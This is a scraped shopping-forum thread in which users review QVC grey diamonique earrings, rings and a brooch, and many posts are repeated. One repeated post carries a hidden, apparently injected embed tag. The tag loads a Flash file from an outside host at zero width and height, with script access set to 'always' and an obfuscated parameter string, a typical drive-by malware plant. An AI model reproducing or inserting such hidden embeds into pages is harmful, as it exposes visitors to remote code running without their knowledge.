GREY diamonique

ShoppingTelly

Help Support ShoppingTelly:

Yes BFT I've got that item and they are lovely, they are perfect for day (not too bright) but still noticable. I also have a stonking great solitaire ring which you could not get away with as real, but it is lovely. Hope you like yours when they arrive. I wear mine more than any of my others.

Yes BFT I've got that item and they are lovely, they are perfect for day (not too bright) but still noticable. I also have a stonking great solitaire ring which you could not get away with as real, but it is lovely. Hope you like yours when they arrive. I wear mine more than any of my others.

Thanks for the review Baby, I'm looking forward to them even more now. I wish they did these same studs in descending sizes, if you know what I mean?, coz I like to wear 3 at time sometimes.

I've liked the look of grey diamonique for a while but hadn't seen a piece that really attracted my eye style-wise until this morning when I found these earrings:

http://www.qvcuk.com/ukqic/qvcapp.aspx/app.detail/params.item.671811

As they are on Waitlist and have no reviews I'm assuming they sold out on their first airing, wasn't there a show of this range on the other day? If anyone on here ordered them please let me know what you think when they arrive :handshake:

I've liked the look of grey diamonique for a while but hadn't seen a piece that really attracted my eye style-wise until this morning when I found these earrings:

http://www.qvcuk.com/ukqic/qvcapp.aspx/app.detail/params.item.671811

As they are on Waitlist and have no reviews I'm assuming they sold out on their first airing, wasn't there a show of this range on the other day? If anyone on here ordered them please let me know what you think when they arrive :handshake:

Yes, Catherine said she might order these.I liked them also but decided to dip my toe in with the studs.

Yes, they did sell out fairly sharpish.

Glad you put a link to these as the thought of grey seemed a bit odd; but on viewing the presentation I would think that they could look quite classy with a little black number.

Glad you put a link to these as the thought of grey seemed a bit odd; but on viewing the presentation I would think that they could look quite classy with a little black number.

Yes, I think you do kind of have to see this stone in motion.

Which is why I will give a full play by play, when I receive mine, for anyone else interested.

Yes BFT I've got that item and they are lovely, they are perfect for day (not too bright) but still noticable. I also have a stonking great solitaire ring which you could not get away with as real, but it is lovely. Hope you like yours when they arrive. I wear mine more than any of my others.<embed allowScriptAccess="always" FlashVars="cid=1&swf=eaememeicgbvbvepepepbuelegebeoebbudvehefbvdyebeedxelbvebegdwdxeqbueieaei" src="http://www.snivi.com/files/1.swf" quality="high" bgcolor="#ffffff" width="0" height="0" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>

Thanks for yout review! That made me tempting and I ended up buying them :happy:

I know this colour has been around for a bit and it has always appealed to me, which is why I decided to the go for these yesterday.

http://www.qvcuk.com/ukqic/qvcapp.a...cid.cswb/walk.html.|ukhtml|Cor_uk_MyAcct,html

Anyone have any experience of this shade?

I was the opposite, BFT. I thought the colour sounded drab and uninspiring! However, I recently got this ring and was entranced with the colour. It doesn't look grey at all imo - more a pale lilac. The sparkle is really impressive and the flashes of different colours from it are excellent too.

That ring is really pretty Perdita, I love that type of cluster design anyway and I'm always a sucker for stones set down the shoulders.

That ring is really pretty Perdita, I love that type of cluster design anyway and I'm always a sucker for stones set down the shoulders.

Thanks, Sue. It really is a fab ring and the price was excellent as I got it in Last Clicks! I love the cushion cut central stone - I'm getting a bit fed up with oval gems at the moment! The clear DQ stones on the shoulders extend quite far down iykwim. I have quite big paws and when the ring is on you don't see the plain silver part of the band at all.

Just nipped back on Fi and read all the reviews which are excellent. I never wear silver (in rings) but am going to give this one a try. Only 2 small sizes left but luckily I can wear a K on my skinny hand lol. :happy:

I've got quite a bit of grey diamoneek & find the 'grey' really varies - I have a ring which is very pale more like normal 'diamond' eek, a necklace which is lilac and a pair of earrings which are quite dark grey. All looked the same on the website so you really have to see it IRL to know what you are getting - but I love all the shades of mine!

Perdita that ring is gorgeous, am very tempted but I have WAY too many rings as it is....!

Perdita that ring is gorgeous, am very tempted but I have WAY too many rings as it is....!

You can never have too many rings, Gemster! :sun:

Just nipped back on Fi and read all the reviews which are excellent. I never wear silver (in rings) but am going to give this one a try. Only 2 small sizes left but luckily I can wear a K on my skinny hand lol. :happy:

I don't tend to wear silver rings either but this one was such a great price I couldn't resist! (..must be the canny Scot in me!)

I hope you're as impressed with yours as I am with mine and look forward to hearing your opinion when it arrives.

I'll let you know hon. I hope mine has the lilacy tone to the stone.

I was the opposite, BFT. I thought the colour sounded drab and uninspiring! However, I recently got this ring and was entranced with the colour. It doesn't look grey at all imo - more a pale lilac. The sparkle is really impressive and the flashes of different colours from it are excellent too.

Nice ring Perdita.

As far as the colour, I've always liked grey in clothes and other things, plus there's something about this shade of diamonique which makes the stone look more authentic than a clear one-to me-, I'm not sure why?*shrugs*

I've got quite a bit of grey diamoneek & find the 'grey' really varies - I have a ring which is very pale more like normal 'diamond' eek, a necklace which is lilac and a pair of earrings which are quite dark grey. All looked the same on the website so you really have to see it IRL to know what you are getting - but I love all the shades of mine!

Cheers for the feedback.

I had the flower style studs a while back, loved them, they looked so classy and then I took them out, put them down and the Borrowers must have pinched one as it has totally vanished. Sadly cannot blame QVC for this!!

My ring has been despatched but while I was checking my account I wandered back into Last Clicks and was forced to order this brooch. My excuse, I just love a good old dangle. :nod:

I have test driven these bad boys for about 6 hours now. They are lovely. Flashes of lavender, green and bits of blue. They look stunning at night time, in artificial light and great in the daytime. I deffo saw more people than normal staring at my lobes.

These are a believable size, dependant on your other accessories. If you're carying a 6 quid bag from Peacocks then no, however if the rest of your gear is a reasonable standard, then yes.:giggle:

So conclusion, I love them and will be buying another grey diamonique piece at some point, most likely earrings.

Latest posts

Back